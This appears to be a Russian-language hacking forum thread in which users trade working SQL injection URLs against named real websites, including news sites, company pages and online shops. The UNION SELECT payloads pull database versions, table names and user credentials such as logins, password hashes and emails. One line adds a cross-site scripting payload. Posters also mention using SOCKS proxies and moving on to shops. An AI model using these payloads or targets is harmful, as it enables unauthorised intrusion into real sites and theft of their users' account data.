Люблю когда все так четко) Code: http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(version(),char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(table_name,char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.tables/* http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(column_name,char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+information_schema.columns+where+table_name="SiteUser"/* http://www.rif.bz/index.php?m=catalog&cat_con=-1+union+select+1,2,3,convert(concat(user_id,char(58),user_login,char(58),user_pass,char(58),user_name),char),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+SiteUser/*
немного отойдя от шока продолжу своё неблагодарное дело =( Code: http://sex.dp.ua/topic.php?categor=-1+union+select+1,concat(login,char(58),password),3,4+from+users+limit+0,1/*
Code: http://www.imhoclub.ru/books/?did=-1+union+select+1,concat(database(),char(58),user(),char(58),version())/* Code: http://www.ugweekend.ru/index.php?mag=07&nid=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version())/* Code: http://www.trizway.com/seminar.php?id=-1+union+select+1,2,3,4,5,6,7,convert(concat(database(),char(58),user(),char(58),version()),char),9,10,11/* http://www.trizway.com/seminar.php?id=-1+union+select+1,2,3,4,5,6,7,convert(email,char),9,10,11+from+author/*
http://mrce.wustl.edu/index.php?id=dynamic_page&itemid=-40+union+select+null,TABLE_NAME,null+FROM+INFORMATION_SCHEMA.TABLES-- но хз как перебирать
mssql Code: http://www.opentext.com/news/pr.html?id=1772+or+1772=@@version-- Code: http://www.sumtotalsystems.com/success/login_global.html?id=-1+union+select+1,2,3,4,5,6,7,8,9+from+regusers/*
Code: http://www.spoono.com/photoshop/tutorials/tutorial.php?id=-1+union+select+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10+from+users+limit+0,1/* юзеров 6, смотрим в тайтл. md5 вроде upd:// Code: http://www.yuldash.com/tg/index.php?id=-1+union+select+version(),2,3,4,5,6,7/*&q=mes&pp=7
Заюзал соксы и начал наверствовать упущеное : Code: http://pravoslavie.info/stat.php?id=-1+union+select+1,2,version(),4,5,6,7,8,9,10/* ____ Code: http://www.cinefantastico.com/filmct.php?id=-1+union+select+1,2,3/* ____ Softholm.com - 2500 посетителей в день Code: http://www.softholm.com/php/dd.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13/* ___
Code: http://www.cipmarseille.com/evenement_fiche.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14/* Всё я спать)
Так и не подобрал таблицу с юзверями( Code: http://www.yukka.ru/detail.php?id=7&pid=-1+union+select+1,convert(concat(database(),char(58),user(),char(58),version()),char),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/*
Таблицы не нашел Code: http://www.lygus.lt./ITC/news.php?id=-1+union+select+1,user(),3,version(),database()/*
http://www.allaboutjazz.com/ Code: http://www.allaboutjazz.com/php/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,version(),39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77/* http://www.caiguoqiang.com/ Code: http://www.caiguoqiang.com/project_detail.php?id=-1+union+select+1,2,3,4,5,user(),7,8,9,10,version(),12,13,14,15,16,17,18,19,20,21,22,23,24,25/* В очередной раз первая скуль...надеюсь эти никто не выкладывал?)
http://www.tomkeays.com/morris/faq/?mid=380000000%20union%20select%201,email,password,4,5,6,7,8,9,10,11,12,13,14%20from%20user/* http://www.tomkeays.com/morris/faq/?srch=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E
Code: http://www.losingtoday.com/tales.php?id=-1+union+select+1,2,3,version(),5,6/* ___ 193 колонки , ппц: Code: http://shapes.aim-at-shape.net/view.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180,181,182,183,184,185,186,187,188,189,190,191,192,193/*
Code: http://career.coe.missouri.edu/index.php?page=-1+union+select+1,2,convert(USER()+using+latin1),4,5,6,7,8,9,0,1/*
Перехожу на чтото более безопасное, на шопы например =) Code: http://best4her.net/shop.php?goods=-1+union+select+1,2,3,convert(version(),char),5,6,7,8,9,10,11,12/* Вот еще один, так же трабла =( 4 версия, названий 30 перебрал и ничего =(. Code: http://blueshop.ru/details.php?product_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*